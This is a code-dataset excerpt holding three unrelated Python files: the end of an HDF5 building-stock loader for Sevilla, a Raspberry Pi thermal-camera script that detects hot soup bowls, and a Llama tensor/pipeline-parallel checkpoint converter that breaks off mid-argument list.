\"total_annual_cost_dhw\": \"float32\",\n \"hs_efficiency\": \"float32\",\n \"dhw_efficiency\": \"float32\",\n \"size_pv_system\": \"float32\",\n \"fed_ambient_sh_per_bssh\": \"float32\",\n \"fed_ambient_dhw_per_bssh\": \"float32\",\n}\n\nHEATING_SYSTEM_INDEX = {\n 1: \"no heating\",\n 2: \"no heating\",\n 3: \"district heating\",\n 4: \"district heating\",\n 5: \"district heating\",\n 6: \"district heating\",\n 7: \"district heating\",\n 8: \"district heating\",\n 9: \"oil\",\n 10: \"oil\",\n 11: \"oil\",\n 12: \"oil\",\n 13: \"oil\",\n 14: \"oil\",\n 15: \"oil\",\n 16: \"oil\",\n 17: \"oil\",\n 18: \"coal\",\n 19: \"coal\",\n 20: \"coal\",\n 21: \"gas\",\n 22: \"gas\",\n 23: \"gas\",\n 24: \"gas\",\n 25: \"gas\",\n 26: \"gas\",\n 27: \"gas\",\n 28: \"gas\",\n 29: \"wood\",\n 30: \"wood\",\n 31: \"wood\",\n 32: \"wood\",\n 33: \"wood\",\n 34: \"wood\",\n 35: \"wood\",\n 36: \"wood\",\n 37: \"electricity\", # TODO rein nehmen\n 38: \"electricity\", # TODO rein nehmen\n 39: \"electricity\", # TODO rein nehmen\n 40: \"split system\", # TODO rein nehmen!\n 41: \"split system\", # TODO rein nehmen!\n 42: \"heat pump air\",\n 43: \"heat pump ground\",\n 44: \"electricity\" # TODO rein nehmen\n}\n\ndef select_invert_building(gdf_row, invert_selection: pd.DataFrame):\n # check if the construction year from urban3r is available in invert:\n\n if gdf_row['invert_construction_period'] in invert_selection[\"construction_period\"]:\n invert_selection.query(f\"construction_period == {gdf_row['invert_construction_period']}\")\n\n # if it is not available take the closest\n else:\n pass\n\n\ndef hdf5_to_pandas(hdf5_file: Path, group_name, columns) -> pd.DataFrame:\n with h5py.File(hdf5_file, 'r') as file:\n # Get the table from the group\n dataset = file[group_name]\n df = pd.DataFrame(index=range(len(dataset)), columns=[list(columns.keys())])\n for name in columns.keys():\n df[name] = dataset[name]\n\n return df\n\n\ndef get_number_energy_carriers_from_invert(group: pd.DataFrame) -> dict:\n numbers = group.groupby(\"energy_carrier_name\")[\"number_of_buildings\"].sum()\n return numbers.to_dict()\n\n\ndef to_series(col):\n if isinstance(col, (pd.DataFrame, pd.Series)):\n return col.squeeze()\n elif isinstance(col, (list, np.ndarray)):\n return pd.Series(col)\n else:\n return col\n\n\ndef calc_mean(data: dict) -> float:\n # Multiply each key with its corresponding value and add them\n sum_products = sum(key * value for key, value in data.items())\n # Calculate the sum of the values\n sum_values = sum(value for value in data.values())\n # Return the mean value\n if sum_values == 0:\n return np.nan\n return sum_products / sum_values\n\n\ndef calculate_mean_supply_temperature(grouped_df: pd.DataFrame,\n heating_system_name: str = None,\n helper_name: str = None) -> float:\n # add supply temperature to bc df:\n # check if there are multiple supply temperatures:\n supply_temperatures = list(grouped_df.loc[:, \"supply_temperature\"].unique())\n if len(supply_temperatures) > 1:\n # group by supply temperature\n supply_temperature_group = grouped_df.groupby(\"supply_temperature\")\n nums = {}\n for temp in supply_temperatures:\n if helper_name == \"get_number_of_buildings\":\n number_buildings_sup_temp = supply_temperature_group.get_group(temp)[\"number_of_buildings\"].sum()\n else:\n number_buildings_sup_temp = supply_temperature_group.get_group(temp)[heating_system_name].sum()\n\n nums[temp] = number_buildings_sup_temp\n # calculate the mean:\n # sometimes the supply temperature is 1000 °C because\n mean_sup_temp = calc_mean(nums)\n else:\n mean_sup_temp = supply_temperatures[0]\n\n return mean_sup_temp\n\n\ndef calculate_mean(grouped: pd.DataFrame, names: list, number_of_buildings: str):\n if grouped[number_of_buildings].sum() == 0: # create nan row so it can be easily dropped later\n new_row = pd.Series(data=[np.nan] * len(grouped[names].columns), index=grouped[names].columns)\n else:\n weights = grouped[number_of_buildings] / grouped[number_of_buildings].sum()\n new_row = (grouped[names].T * weights).T.sum()\n return new_row\n\n\ndef create_representative_building(group: pd.DataFrame,\n column_name_with_numbers: str,\n merging_names: list,\n adding_names: list) -> pd.DataFrame:\n new_row = pd.DataFrame(columns=group.columns, index=[0])\n # representative air source HP building\n new_row.loc[0, merging_names] = calculate_mean(group,\n names=merging_names,\n number_of_buildings=column_name_with_numbers)\n new_row.loc[0, adding_names] = group.loc[:, adding_names].sum()\n\n # new name is first 5 letters of first name + heating system\n new_row.loc[0, \"heating_medium\"] = group.loc[:, \"heating_medium\"].values[-1]\n new_row[\"construction_period_start\"] = group[\"construction_period_start\"].values[-1]\n new_row[\"construction_period_end\"] = group[\"construction_period_end\"].values[-1]\n new_row.loc[0, \"name\"] = f\"{str(group.loc[:, 'name'].iloc[0])}\"\n new_row.loc[0, \"index\"] = group.loc[:, \"index\"].iloc[0] # new index is the first index of merged rows\n return new_row\n\n\ndef filter_only_sevilla_buildings(df: pd.DataFrame):\n mask = df[\"name\"].astype(str).isin([name for name in df[\"name\"].astype(str) if \"Sevilla\" in name])\n return df.loc[mask, :]\n\n\ndef get_number_of_buildings_from_invert_spain() -> pd.DataFrame:\n hdf5_f = Path(r\"C:\\Users\\mascherbauer\\PycharmProjects\\OSM\\001_buildings_spain.hdf5\")\n bc_df = hdf5_to_pandas(hdf5_f, f\"BC_{2020}\", BUILDING_CLASS_COLUMNS)\n bssh_df = hdf5_to_pandas(hdf5_f, f\"BSSH_{2020}\", BUILDING_SEGMENT_COLUMNS)\n # reomve multiindex\n bssh_df.columns = bssh_df.columns.map(''.join)\n bc_df.columns = bc_df.columns.map(''.join)\n # change columns to series:\n bssh = bssh_df.apply(to_series)\n bc = bc_df.apply(to_series)\n bc[\"building_categories_index\"] = bc[\"building_categories_index\"].astype(int)\n # use only Sevilla buildings!\n bc = filter_only_sevilla_buildings(bc)\n bssh = filter_only_sevilla_buildings(bssh)\n\n # columns where numbers are summed up (PV and number of buildings)\n adding_names = [name for name in bc.columns if \"number\" in name] + [\"number_of_buildings\"]\n # columns to merge: [2:] so index and name are left out\n merging_names = [\n name for name in bc.columns if \"PV\" and \"number\" not in name and \"construction\" not in name\n ][2:] + adding_names[:3]\n # except number of persons and number of dwellings ([3:]) left out\n adding_names = adding_names[3:]\n\n # Group the rows of bssh_df by building_classes_index\n bssh_grouped = bssh.groupby([\"building_classes_index\", \"heat_supply_system_index\"])\n new_bc = pd.DataFrame()\n for (index, heat_system), group in bssh_grouped:\n # reset the index to the invert index:\n group = group.set_index(\"index\")\n bc_group = bc.loc[bc.loc[:, \"index\"].isin(list(group.index)), :]\n # check if bc_group is an empty frame and continue if so\n if bc_group.shape[0] == 0:\n continue\n bc_group.loc[:, \"number_of_buildings\"] = bc_group.loc[:, \"index\"].map(group.loc[:, \"number_of_buildings\"])\n bc_group.loc[:, \"heating_medium\"] = HEATING_SYSTEM_INDEX[heat_system]\n # create representative building out of the same invert buildings with different heating systems\n new_building = create_representative_building(group=bc_group,\n column_name_with_numbers=\"number_of_buildings\",\n merging_names=merging_names,\n adding_names=adding_names)\n\n new_bc = pd.concat([new_bc, new_building], axis=0)\n\n # drop nan rows because the number of buildings is 0\n final_df = new_bc.dropna(axis=0).reset_index(drop=True)\n return final_df\n\n\n\nif __name__ == \"__main__\":\n get_number_of_buildings_from_invert_spain()\n\n","repo_name":"PhilippMaschi/OSM","sub_path":"load_invert_data.py","file_name":"load_invert_data.py","file_ext":"py","file_size_in_byte":10787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10354935736","text":"from collections import deque\nimport os\nimport shutil\nimport time\nimport cv2\nimport numpy as np\nimport datetime\nfrom picamera2 import Picamera2\nfrom picamera2.encoders import H264Encoder, Quality\nfrom picamera2.outputs import CircularOutput\n\nos.chdir('/home/matejnevlud/')\n\n# Configure camera for 2304, 1296 mode\npicam2 = Picamera2()\nvideo_config = picam2.create_video_configuration({'size': (256, 192), 'format': 'XBGR8888'},\n raw={'size': (2304, 1296)},\n controls={'NoiseReductionMode': 0, 'FrameRate': 50})\npicam2.configure(video_config)\npicam2.start_preview()\nencoder = H264Encoder()\nencoder.output = CircularOutput()\npicam2.encoder = encoder\npicam2.start()\npicam2.start_encoder(encoder=encoder, quality=Quality.LOW)\n\nthermalcamera = Picamera2(1)\nthermalcamera.configure(thermalcamera.create_video_configuration(raw=True))\nthermalcamera.start()\n\ntime.sleep(2)\n\nbgsub = cv2.bgsegm.createBackgroundSubtractorCNT(minPixelStability=1, useHistory=False, maxPixelStability=2, isParallel=True)\n\n# named fullscreen window on ubutn\n# cv2.namedWindow('frame', cv2.WND_PROP_FULLSCREEN)\n# cv2.setWindowProperty('frame', cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n\n\ntimestamp = datetime.datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\nDIR_NAME = '/home/matejnevlud/thermal_images_' + timestamp\n# os.makedirs(DIR_NAME, exist_ok=True)\nos.makedirs('XXX', exist_ok=True)\n\n# Capture 100 frames and calculate FPS\nlast_time = time.time()\nframe_count = 0\ncolor_frame = np.zeros((192, 256, 3), dtype=np.uint8)\nthermal_frame = np.zeros((192, 256), dtype=np.float32)\n\n# create deques for storing max value\n# and min value for the last 100 frames\nmax_t_deque = deque(maxlen=100)\nmin_t_deque = deque(maxlen=100)\nmean_t_deque = deque(maxlen=100)\n\nDEQUE_LEN = 200\nsoup_area_deque = deque(maxlen=200)\nsoup_t_deque = deque(maxlen=200)\nsoup_min_t_deque = deque(maxlen=200)\nsoup_avg_t_deque = deque(maxlen=200)\nsoup_delta_t_deque = deque(maxlen=200)\nlast_soup_timestamp = datetime.datetime.now()\n\nlast_soup_min_t_z_score = 0\n\n\ndef preprocess_pi_frame(pi_frame):\n pi_frame = cv2.cvtColor(pi_frame, cv2.COLOR_BGR2RGB)\n pi_frame = cv2.rotate(pi_frame, cv2.ROTATE_90_COUNTERCLOCKWISE)\n # cv2.imshow('pi_frame0', pi_frame)\n\n # pts1 = np.float32([[75, 0], [160, 0], [67, 207], [180, 220]])\n # pts2 = np.float32([[0, 0], [192, 0], [0, 340], [192, 340]])\n pts1 = np.float32([[60, 58], [172, 55], [55, 215], [190, 225]])\n pts2 = np.float32([[0, 0], [192, 0], [0, 256], [192, 256]])\n M = cv2.getPerspectiveTransform(pts1, pts2)\n pi_frame = cv2.warpPerspective(pi_frame, M, (192, 256), flags=cv2.INTER_NEAREST)\n\n # pyramid mean shift filtering\n # pi_frame = cv2.pyrMeanShiftFiltering(pi_frame, 3, 3)\n # pi_frame = cv2.bilateralFilter(pi_frame, 15, 30, 90)\n cv2.imshow('pi_frame2', pi_frame)\n\n pi_frame = cv2.GaussianBlur(pi_frame, (5, 5), 0)\n\n return pi_frame\n\n\ndef detect_soups(pi_frame_foreground):\n contours, hierarchy = cv2.findContours(pi_frame_foreground.astype(np.uint8), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n pi_frame_foreground = np.zeros((256, 192), dtype=np.uint8)\n soups_rects = []\n for cnt in contours:\n hull = cv2.convexHull(cnt)\n area = cv2.contourArea(cnt)\n x, y, w, h = cv2.boundingRect(cnt)\n\n cv2.drawContours(pi_frame_foreground, [cnt], 0, (64, 64, 64), -1)\n\n if area > 3000 and w > 80 and h > w and y > 0 and y + h < 256:\n soup_area_deque.append(area)\n cv2.drawContours(pi_frame_foreground, [hull], 0, (255, 255, 255), -1)\n cv2.rectangle(pi_frame_foreground, (x, y), (x + w, y + h), (255, 255, 255), 2)\n soups_rects.append((x, y, w, h))\n\n return pi_frame_foreground, soups_rects\n\n\ndef preprocess_thermal_frame(frame_usb):\n frame_mid_pos = int(len(frame_usb) / 2)\n\n thermal_buffer = frame_usb[frame_mid_pos:]\n thermal_picture_u16 = np.frombuffer(thermal_buffer, dtype=np.uint16).reshape((192, 256))\n thermal_picture_u16 = cv2.rotate(thermal_picture_u16, cv2.ROTATE_90_COUNTERCLOCKWISE)\n thermal_picture_u16 >>= 2\n thermal_picture_f32 = thermal_picture_u16.astype(np.float32)\n thermal_picture_f32 /= 16\n thermal_picture_f32 -= 273.15\n\n thermal_picture_f32 = np.clip(thermal_picture_f32, 0, 50)\n\n return thermal_picture_f32\n\n\npi_frames_deque = deque(maxlen=10 * 25)\nusb_frames_deque = deque(maxlen=10 * 25)\ntimestamp = datetime.datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\nDIR_NAME = 'thermal_images_' + timestamp\n\n\ndef add_frames_to_buffer(pi_frame, usb_frame):\n pi_frames_deque.append(pi_frame)\n usb_frames_deque.append(usb_frame)\n\n\ndef save_frame_buffers_to_disk():\n print('saving frames to disk')\n os.makedirs(DIR_NAME, exist_ok=True)\n for i, (pi_frame, usb_frame) in enumerate(zip(pi_frames_deque, usb_frames_deque)):\n cv2.imwrite(f'{DIR_NAME}/frame_{i:04d}.png', pi_frame)\n with open(f'{DIR_NAME}/frame_{i:04d}.raw', 'wb') as f:\n f.write(usb_frame)\n # archive the folder\n shutil.make_archive(DIR_NAME, 'zip', DIR_NAME)\n # delete the folder\n shutil.rmtree(DIR_NAME)\n\n\nlast_thermal_frame = None\nfire = False\nwhile 1:\n frame_count += 1\n fire = False\n\n pi_frame = picam2.capture_array(\"main\")\n frame_usb = thermalcamera.capture_array()\n add_frames_to_buffer(pi_frame, frame_usb)\n\n pi_frame = preprocess_pi_frame(pi_frame)\n\n pi_frame = bgsub.apply(pi_frame)\n pi_frame = cv2.dilate(pi_frame, np.ones((7, 7), np.uint8), iterations=2)\n pi_frame = cv2.erode(pi_frame, np.ones((7, 7), np.uint8), iterations=2)\n\n pi_frame, soups_rects = detect_soups(pi_frame)\n cv2.imshow('pi_frame3', pi_frame)\n\n thermal_frame = preprocess_thermal_frame(frame_usb)\n\n # check if thermal_frame changed since last frame\n if np.array_equal(last_thermal_frame, thermal_frame):\n print('✋✋✋✋✋✋✋✋✋✋✋✋✋✋', end='\\r')\n continue\n last_thermal_frame = thermal_frame.copy()\n\n #  check if last_soup_timestamp is older than 10 seconds\n if (datetime.datetime.now() - last_soup_timestamp).total_seconds() > 5 and len(soup_min_t_deque) > 0:\n print('🗑️ 🗑️ 🗑️ 🗑️ 🗑️ 🗑️ 🗑️ 🗑️ Resetting soup deques ', end='\\n')\n\n soup_area_deque.clear()\n soup_t_deque.clear()\n soup_min_t_deque.clear()\n soup_avg_t_deque.clear()\n soup_delta_t_deque.clear()\n last_soup_timestamp = datetime.datetime.now()\n\n # calculate min and max values for the last 100 frames\n max_t_deque.append(thermal_frame.max())\n min_t_deque.append(thermal_frame.min())\n\n # remove soups_rects from thermal_frame\n soups_frames = []\n thermal_frame_without_soups = thermal_frame.copy()\n soups_frame = np.zeros(thermal_frame.shape, dtype=np.float32)\n for x, y, w, h in soups_rects:\n soup_frame = thermal_frame[y:y + h, x:x + w].copy()\n\n soup_mean_t = np.nanmean(soup_frame)\n soup_t_deque.append(soup_mean_t)\n\n soup_max_t = np.nanmax(soup_frame)\n soup_min_t = np.nanmin(soup_frame)\n soup_avg_t = np.nanmean(soup_frame)\n soup_avg_t_deque.append(soup_avg_t)\n soup_min_t_deque.append(soup_min_t)\n soup_delta_t = soup_max_t - soup_min_t\n soup_delta_t_deque.append(soup_delta_t)\n\n soup_delta_t_z_score = (soup_delta_t - np.nanmean(soup_delta_t_deque)) / np.nanstd(soup_delta_t_deque)\n soup_min_t_z_score = (soup_min_t - np.nanmean(soup_min_t_deque)) / np.nanstd(soup_min_t_deque)\n\n if ((soup_min_t_z_score > 4.5 or soup_min_t - np.nanmean(soup_min_t_deque) > 4) and len(soup_min_t_deque) > DEQUE_LEN / 2):\n fire = True\n short_timestamp = datetime.datetime.now().strftime(\"%H-%M-%S\")\n if soup_min_t - np.nanmean(soup_min_t_deque) > 4:\n short_timestamp += '_HOTTER'\n print(f'🔥🔥🔥🔥🔥🔥🔥🔥 min_t: {soup_min_t:.2f}, soup_avg_t {soup_avg_t:.2f}, soup_min_t_z_score: {soup_min_t_z_score:.2f} [{short_timestamp}]', )\n cv2.imwrite(f'XXX/frame_{short_timestamp}_{str(int(soup_min_t_z_score))}.png', cv2.applyColorMap(cv2.normalize(soup_frame, None, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U), cv2.COLORMAP_JET))\n\n # prepare and write small log file with this detection next to the image\n with open(f'XXX/frame_{short_timestamp}_{str(int(soup_min_t_z_score))}.txt', 'w') as f:\n f.write(f'queue_min_t: {np.nanmean(soup_min_t_deque):.2f}, queue_delta_t {np.nanmean(soup_delta_t_deque):.2f}, last_min_t_z_score: {last_soup_min_t_z_score:.2f}\\n')\n f.write(f'soup_min_t: {soup_min_t:.2f}, soup_delta_t {soup_delta_t:.2f}, soup_min_t_z_score: {soup_min_t_z_score:.2f}, soup_avg_t: {soup_avg_t:.2f}\\n')\n\n last_soup_min_t_z_score = soup_min_t_z_score\n\n thermal_frame_without_soups[y:y + h, x:x + w] = np.nan\n\n # paste soup_frame into soups_frame\n soups_frame[y:y + h, x:x + w] = soup_frame\n\n last_soup_timestamp = datetime.datetime.now()\n\n # calculate mean temperature of thermal_frame but filter out 0 values\n mean_t_deque.append(np.nanmean(thermal_frame_without_soups))\n\n # overlay frame on thermal image\n thermal_picture_colored = cv2.applyColorMap(cv2.normalize(thermal_frame, None, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U), cv2.COLORMAP_JET)\n frame = cv2.cvtColor(pi_frame, cv2.COLOR_GRAY2RGB)\n frame = cv2.addWeighted(frame, 0.6, thermal_picture_colored, 0.6, 0)\n if fire:\n # draw red circle in top right corner to indicate fire detection\n cv2.circle(frame, (frame.shape[1] - 20, 20), 12, (0, 0, 255), -1)\n\n cv2.imshow('frame', frame)\n\n # calculate FPS\n now = time.time()\n fps = 1 / (now - last_time)\n last_time = now\n print(f'fps: {fps:.2f}, soup_min_t: {np.nanmean(soup_min_t_deque):.2f}, soup_avg_t {np.nanmean(soup_avg_t_deque):.2f}', f'🍲 soup_min_t_z_score: {last_soup_min_t_z_score:.2f}' if len(soups_rects) > 0 else ' ', end='\\r')\n\n #  print O if no soups detected else 4, using one print statement\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\npicam2.stop()\ncv2.destroyAllWindows()\n\nsave_frame_buffers_to_disk()","repo_name":"BiCo-Digital/altin-thermal","sub_path":"experiments/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"27394568529","text":"import argparse\nimport json\nimport os\n\nimport torch\nimport torch_xla.utils.serialization as xser\n\nfrom training_utils import create_partition\n\n\ndef merge_llama_tp_checkpoints(args):\n full_model = {}\n if args.kv_size_multiplier > 1:\n with open(args.config, \"r\") as f:\n config = json.load(f)\n q_heads = config[\"num_attention_heads\"]\n kv_heads = config[\"num_key_value_heads\"]\n head_dim = config[\"hidden_size\"] // q_heads\n\n for tp_rank in range(args.tp_size):\n for pp_rank in range(args.pp_size):\n if args.load_xser:\n partial_state = load_partial_xser(args, tp_rank, pp_rank)\n else:\n partial_state = load_partial_no_xser(args, tp_rank, pp_rank)\n if args.model_key is not None and args.model_key in partial_state:\n partial_state = partial_state[args.model_key]\n for name, param in partial_state.items():\n if \"qkv_proj\" in name:\n # qkv_proj would be a key if we are using the QKVLinear layer\n partition_dim = 0\n if name not in full_model:\n full_model[name] = []\n full_model[name].append(param)\n if tp_rank == (args.tp_size - 1):\n full_weight = torch.cat(full_model[name], dim=partition_dim)\n if \"weight_k\" in name or \"weight_v\" in name:\n # If kv_multiplier is set, the kv heads are repeated. So we need to\n # take only the first chunk\n full_model[name] = torch.chunk(full_weight, args.kv_size_multiplier)[0]\n else:\n # Since we do the replication of KV heads, the Q heads are placed as:\n # Q0Q1Q8Q9...Q2Q3Q10Q11...\n # Hence when creating the merged checkpoint, we need to bring the Q heads in order.\n q_weights = full_weight.view(q_heads, head_dim, -1)\n q_weights_shape = q_weights.size()\n q_weights = q_weights.view(\n -1, q_heads // (kv_heads * args.kv_size_multiplier), head_dim, q_weights_shape[-1]\n )\n weight_splits = []\n indicies = torch.arange(0, args.tp_size // kv_heads) * kv_heads\n for i in range(kv_heads):\n weight_splits.append(q_weights[indicies + i].view(-1, q_weights_shape[-1]))\n full_weight = torch.cat(weight_splits, dim=0)\n full_model[name] = full_weight\n elif (\n \"embed_tokens\" in name\n or \"q_proj\" in name\n or \"k_proj\" in name\n or \"v_proj\" in name\n or \"o_proj\" in name\n or \"down_proj\" in name\n or \"lm_head\" in name\n ):\n partition_dim = 1 if (\"o_proj\" in name or \"down_proj\" in name) else 0\n if name not in full_model:\n full_model[name] = []\n full_model[name].append(param)\n if tp_rank == (args.tp_size - 1):\n full_weight = torch.cat(full_model[name], dim=partition_dim)\n full_model[name] = full_weight\n elif \"gate_up_proj\" in name:\n partition_dim = 0\n dim_size = param.size()[partition_dim] // 2\n gate_proj_name = name.replace(\"gate_up_proj\", \"gate_proj\")\n up_proj_name = name.replace(\"gate_up_proj\", \"up_proj\")\n gate_proj_weight = param.narrow(partition_dim, 0, dim_size).detach().clone()\n up_proj_weight = param.narrow(partition_dim, dim_size, dim_size).detach().clone()\n if gate_proj_name not in full_model:\n full_model[gate_proj_name] = []\n if up_proj_name not in full_model:\n full_model[up_proj_name] = []\n full_model[gate_proj_name].append(gate_proj_weight)\n full_model[up_proj_name].append(up_proj_weight)\n if tp_rank == (args.tp_size - 1):\n full_gate_proj_weight = torch.cat(full_model[gate_proj_name], dim=partition_dim)\n full_up_proj_weight = torch.cat(full_model[up_proj_name], dim=partition_dim)\n full_model[gate_proj_name] = full_gate_proj_weight\n full_model[up_proj_name] = full_up_proj_weight\n else:\n if name not in full_model:\n full_model[name] = param\n return full_model\n\n\ndef translate_llama_full_state_dict_to_tp(\n full_state, tp_size, tp_rank, pp_size, pp_rank, partitions, kv_size_multiplier, config_json\n):\n partial_state = {}\n for name, full_p in full_state.items():\n ##################### PP Slice #########################################\n # Embedding only in first PP\n if pp_rank != 0 and \"embed_tokens\" in name:\n continue\n # LMhead and final layer norm only in last PP rank\n if pp_rank != pp_size - 1 and (\"lm_head\" in name or \"model.norm.weight\" in name):\n continue\n if \"layers\" in name:\n layer_idx = int(name.split(\".\")[2])\n pre_layer_cut = int(partitions[pp_rank - 1].split(\".\")[2]) if pp_rank > 0 else -10000000\n current_layer_cut = int(partitions[pp_rank].split(\".\")[2]) if pp_rank < pp_size - 1 else 10000000\n if layer_idx <= pre_layer_cut or layer_idx > current_layer_cut:\n continue\n\n ##################### TP Slice #########################################\n if (\"q_proj\" in name or \"k_proj\" in name or \"v_proj\" in name or \"qkv_proj\" in name) and kv_size_multiplier > 1:\n with open(config_json, \"r\") as f:\n config = json.load(f)\n q_heads = config[\"num_attention_heads\"]\n kv_heads = config[\"num_key_value_heads\"]\n head_dim = config[\"hidden_size\"] // q_heads\n if \"k_proj\" in name or \".v_proj\" in name or \"weight_k\" in name or \"weight_v\" in name:\n repeated_kv = full_p.repeat(kv_size_multiplier, 1)\n\n dim_size = repeated_kv.size()[0]\n assert dim_size % tp_size == 0, \"0th dim after KV replication is not divisible by tp_size\"\n partition_size = dim_size // tp_size\n with torch.no_grad():\n to_load = repeated_kv.narrow(0, tp_rank * partition_size, partition_size).detach().clone()\n # When kv_multiplier is greater than 1, it means we are using the qkv_linear layer.\n # Hence the key name needs to be adjusted.\n name = (\n \".\".join(name.split(\".\")[:-2])\n + \".qkv_proj.\"\n + (\"weight_k\" if \"weight_k\" in name or \"k_proj\" in name else \"weight_v\")\n )\n partial_state[name] = to_load\n else:\n # When GQAQKV linear with kv_multiplier is used, we need to reshuffle the order of Q heads so that\n # they interact with the right KV heads.\n q_weights = full_p.view(q_heads, head_dim, -1)\n q_weights_shape = q_weights.size()\n q_weights = q_weights.view(\n -1, q_heads // (kv_heads * kv_size_multiplier), head_dim, q_weights_shape[-1]\n )\n weight_splits = []\n indicies = torch.arange(0, kv_heads) * tp_size // kv_heads\n for i in range(tp_size // kv_heads):\n weight_splits.append(q_weights[indicies + i])\n q_weights = torch.cat(weight_splits, dim=0)\n with torch.no_grad():\n to_load = q_weights[tp_rank].view(-1, q_weights_shape[-1])\n name = \".\".join(name.split(\".\")[:-2]) + \".qkv_proj.weight_q\"\n print(name)\n partial_state[name] = to_load\n\n elif (\n \"embed_tokens\" in name\n or \"q_proj\" in name\n or \"k_proj\" in name\n or \"v_proj\" in name\n or \"o_proj\" in name\n or \"down_proj\" in name\n or \"lm_head\" in name\n ):\n # parallel embedding or ColumnParallelLinear, parallel on 0th dim\n # RowParallelLinear parallel on 1st dim\n partition_dim = 1 if (\"o_proj\" in name or \"down_proj\" in name) else 0\n dim_size = full_p.size()[partition_dim]\n assert dim_size % tp_size == 0, \"vocab size is not divisiable\"\n partition_size = dim_size // tp_size\n with torch.no_grad():\n to_load = full_p.narrow(partition_dim, tp_rank * partition_size, partition_size).detach().clone()\n partial_state[name] = to_load\n elif \"gate_proj\" in name or \"up_proj\" in name:\n # ColumnParallelLinear\n partition_dim = 0\n dim_size = full_p.size()[partition_dim]\n assert dim_size % tp_size == 0, \"vocab size is not divisiable\"\n partition_size = dim_size // tp_size\n with torch.no_grad():\n to_load = full_p.narrow(partition_dim, tp_rank * partition_size, partition_size).detach().clone()\n token = \"gate_proj\" if \"gate_proj\" in name else \"up_proj\"\n updated_name = name.replace(token, \"gate_up_proj\")\n if updated_name in partial_state:\n if token == \"gate_proj\":\n partial_state[updated_name] = torch.cat([to_load, partial_state[updated_name]], dim=0)\n else:\n partial_state[updated_name] = torch.cat([partial_state[updated_name], to_load], dim=0)\n else:\n partial_state[updated_name] = to_load\n else:\n # no TP\n partial_state[name] = full_p\n return partial_state\n\n\n# Save Load Entries\ndef load_full(args):\n full_state = torch.load(args.input_dir)\n return full_state\n\n\ndef load_partial_xser(args, tp_rank, pp_rank):\n load_dir = os.path.join(args.input_dir, \"tp_rank_{:02d}_pp_rank_{:02d}\".format(tp_rank, pp_rank))\n partial_state = xser.load(load_dir)\n return partial_state\n\n\ndef load_partial_no_xser(args, tp_rank, pp_rank):\n load_dir = os.path.join(args.input_dir, \"tp_rank_{:02d}_pp_rank_{:02d}\".format(tp_rank, pp_rank), \"checkpoint.pt\")\n partial_state = torch.load(load_dir)\n return partial_state\n\n\ndef save_full(args, full_model):\n save_path = args.output_dir\n os.makedirs(save_path, exist_ok=True)\n if os.path.isdir(save_path):\n save_path = os.path.join(save_path, \"checkpoint.pt\")\n print(f\"Saving full checkpoint to {save_path}\")\n torch.save(full_model, save_path)\n\n\ndef save_partial_xser(args, partial_state, tp_rank, pp_rank):\n save_dir = os.path.join(args.output_dir, \"tp_rank_{:02d}_pp_rank_{:02d}\".format(tp_rank, pp_rank))\n os.makedirs(args.output_dir, exist_ok=True)\n print(f\"Saving to {save_dir}\")\n xser.save(partial_state, save_dir)\n\n\ndef save_partial_no_xser(args, partial_state, tp_rank, pp_rank):\n save_dir = os.path.join(args.output_dir, \"tp_rank_{:02d}_pp_rank_{:02d}\".format(tp_rank, pp_rank))\n os.makedirs(save_dir, exist_ok=True)\n print(f\"Saving to {save_dir}\")\n torch.save(partial_state, os.path.join(save_dir, \"checkpoint.pt\"))\n\n\n# Convertion Entries\ndef convert_from_xser(args):\n for tp_rank in range(args.tp_size):\n for pp_rank in range(args.pp_size):\n partial_state = load_partial_xser(args, tp_rank, pp_rank)\n save_partial_no_xser(args, partial_state, tp_rank, pp_rank)\n\n\ndef convert_to_xser(args):\n for tp_rank in range(args.tp_size):\n for pp_rank in range(args.pp_size):\n partial_state = load_partial_no_xser(args, tp_rank, pp_rank)\n save_partial_xser(args, partial_state, tp_rank, pp_rank)\n\n\ndef convert_from_full_model(args):\n full_state = load_full(args)\n partitions = create_partition(args.n_layers, args.pp_size)\n print(f\"pipeline_cuts {partitions}\")\n if args.kv_size_multiplier > 1:\n assert args.config is not None, \"If kv_size_multipler is greater than 1, need to pass config.json\"\n for tp_rank in range(args.tp_size):\n for pp_rank in range(args.pp_size):\n partial_state = translate_llama_full_state_dict_to_tp(\n full_state,\n args.tp_size,\n tp_rank,\n args.pp_size,\n pp_rank,\n partitions,\n args.kv_size_multiplier,\n args.config,\n )\n if args.save_xser:\n save_partial_xser(args, partial_state, tp_rank, pp_rank)\n else:\n save_partial_no_xser(args, partial_state, tp_rank, pp_rank)\n\n\ndef convert_to_full_model(args):\n full_model = merge_llama_tp_checkpoints(args)\n save_full(args, full_model)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_dir\", type=str, required=True, help=\"Path to input model/weights\")\n parser.add_argument(\"--output_dir\", type=str, required=True, help=\"Path to save converted model/weights\")\n parser.add_argument(\n \"--model_key\", type=str, default=\"model\", help=\"Key of the model state dict in the checkpoint object\"\n )\n parser.add_argument(\"--tp_size\", type=int, default=1, help=\"Tensor Parallel degree for the model\")\n parser.add_argument(\"--pp_size\", type=int, default=1, help=\"Pipeline Parallel degree for the model\")\n parser.add_argument(\"--n_layers\", type=int, default=0, help=\"Number of Layers\")\n parser.add_argument(\"--load_xser\", type=bool, default=False, help=\"Load from xser saved checkpoints\")\n parser.add_argument(\"--save_xser\", type=bool, default=False, help=\"Save with xser\")\n parser.add_argument(\n \"--convert_from_xser\", action=\"store_true\", help=\"Convert xser saved checkpoint to normal torch checkpoint\"\n )\n parser.add_argument(\n \"--convert_to_xser\", action=\"store_true\", help=\"Convert normal torch checkpoint to xser checkpoint\"\n )\n parser.add_argument(\"--convert_from_full_model\", action=\"store_true\", help=\"Convert full model to sharded model\")\n parser.add_argument(\"--convert_to_full_model\", action=\"store_true\", help=\"Convert sharded model to full model\")\n parser.add_argument(\n \"--kv_size_multiplier\", type=int, 